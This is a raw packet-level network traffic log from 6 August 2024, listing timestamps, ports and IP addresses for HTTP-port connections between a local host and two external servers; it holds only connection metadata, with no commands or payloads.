Aug 6, 2024 07:58:41.303337097 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.303416967 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.303433895 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.303445101 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.303462029 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.303468943 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.303474903 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.303482056 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.303488016 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.303488970 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.303489923 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.303522110 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.303525925 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.303538084 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.303561926 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.303978920 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304019928 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.304028988 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304039955 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304080009 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.304105043 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304116011 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304126024 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304137945 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304183006 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.304258108 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304270029 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304280043 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304296017 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304305077 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.304306984 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304317951 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304328918 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304333925 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.304347992 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.304413080 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304424047 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304434061 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304450035 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.304450989 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304456949 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304459095 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304461956 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304466009 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.304472923 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.304502964 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.305001020 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305036068 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.305097103 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305108070 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305121899 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305134058 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305144072 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305144072 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.305155993 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305170059 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.305185080 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.305213928 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305229902 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305242062 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305253029 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305263996 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305269957 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.305285931 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.305327892 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305337906 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305354118 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305362940 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.305362940 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305371046 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305377007 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305397034 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.305421114 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.305460930 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305473089 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305484056 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305495024 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.305495024 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.305519104 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.306118011 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306128979 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306138039 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306169987 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.306191921 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.306199074 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306209087 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306220055 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306230068 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306246042 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.306267023 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.306277037 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306291103 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306320906 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.306360006 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306370020 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306386948 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306406975 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.306410074 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306427002 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306433916 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306444883 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.306471109 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.306521893 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306534052 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306544065 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306555033 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306566000 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.306581020 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306596041 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306607008 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.306607962 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306636095 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.306890011 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306901932 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306912899 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306926012 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.306967020 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306972027 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.306977987 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.306988955 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.307007074 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.307008028 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.307018995 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.307055950 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.307218075 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.307229042 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.307241917 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.307249069 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.307276011 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.307336092 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.307346106 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.307358027 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.307369947 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.307379007 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.307404041 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.307420015 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.307430029 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.307444096 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.307455063 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.307461023 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.307466030 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.307487965 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.307965994 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.428620100 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.428661108 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.428700924 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.428711891 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.428797960 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.428809881 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.428822041 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.428834915 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.428844929 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.428854942 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.428857088 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.428869009 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.428939104 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.428950071 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.428951979 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.428961992 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.428996086 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.429025888 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429038048 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429050922 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429083109 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.429095984 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429106951 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429131031 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.429195881 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429208040 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429219007 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429229975 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429229975 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.429240942 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429253101 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429258108 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.429285049 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.429305077 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429338932 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.429354906 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429366112 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429398060 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.429429054 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429487944 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429498911 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429524899 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.429563999 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429575920 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429586887 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429600954 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.429616928 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.429653883 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429666042 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429677010 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429687023 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429711103 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.429734945 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.429867983 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429928064 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429941893 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429954052 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.429960012 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.429990053 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.430015087 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430026054 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430036068 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430047989 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430071115 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.430094957 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.430217981 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430228949 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430234909 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430241108 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430250883 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430260897 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430270910 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.430273056 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430284977 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430295944 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430298090 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.430320978 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.430347919 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430370092 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430383921 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.430691004 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430727959 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.430747032 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430754900 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430788040 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.430838108 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430850029 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430860043 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430871964 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430896997 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.430919886 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.430941105 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430953026 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430965900 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430978060 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.430989981 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.431016922 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.431063890 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431073904 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431085110 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431094885 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431103945 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.431106091 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431129932 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.431164026 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.431224108 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431235075 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431240082 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431250095 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431261063 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431267023 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.431272030 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431296110 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.431603909 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431642056 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.431647062 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431658030 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431684017 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431688070 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.431785107 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431797028 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431807995 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431818962 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.431819916 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431843042 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.431876898 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431889057 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431901932 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431907892 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.431950092 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.431976080 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.432018042 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432029009 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432039022 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432049990 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432051897 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.432060957 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432077885 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.432102919 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.432178974 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432188988 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432199001 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432209969 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432221889 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432228088 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.432236910 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432244062 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.432271957 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.432622910 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432702065 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432719946 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432729959 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432739973 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.432776928 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.432801008 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432817936 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432845116 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432856083 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432868004 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.432872057 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432890892 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.432929039 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432939053 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.432966948 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.500648975 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.519026041 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.519041061 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.519052029 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.519059896 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:41.519172907 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.522034883 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:41.526861906 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:46.969585896 CEST	49739	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:46.974387884 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:46.977588892 CEST	49739	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:46.989451885 CEST	49739	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:46.994242907 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.559601068 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.559629917 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.559637070 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.559643984 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.559653044 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.559672117 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.559720039 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.559726000 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.559859991 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.559889078 CEST	49739	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:47.559889078 CEST	49739	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:47.559915066 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.563894033 CEST	49739	80	192.168.2.7	203.161.46.201
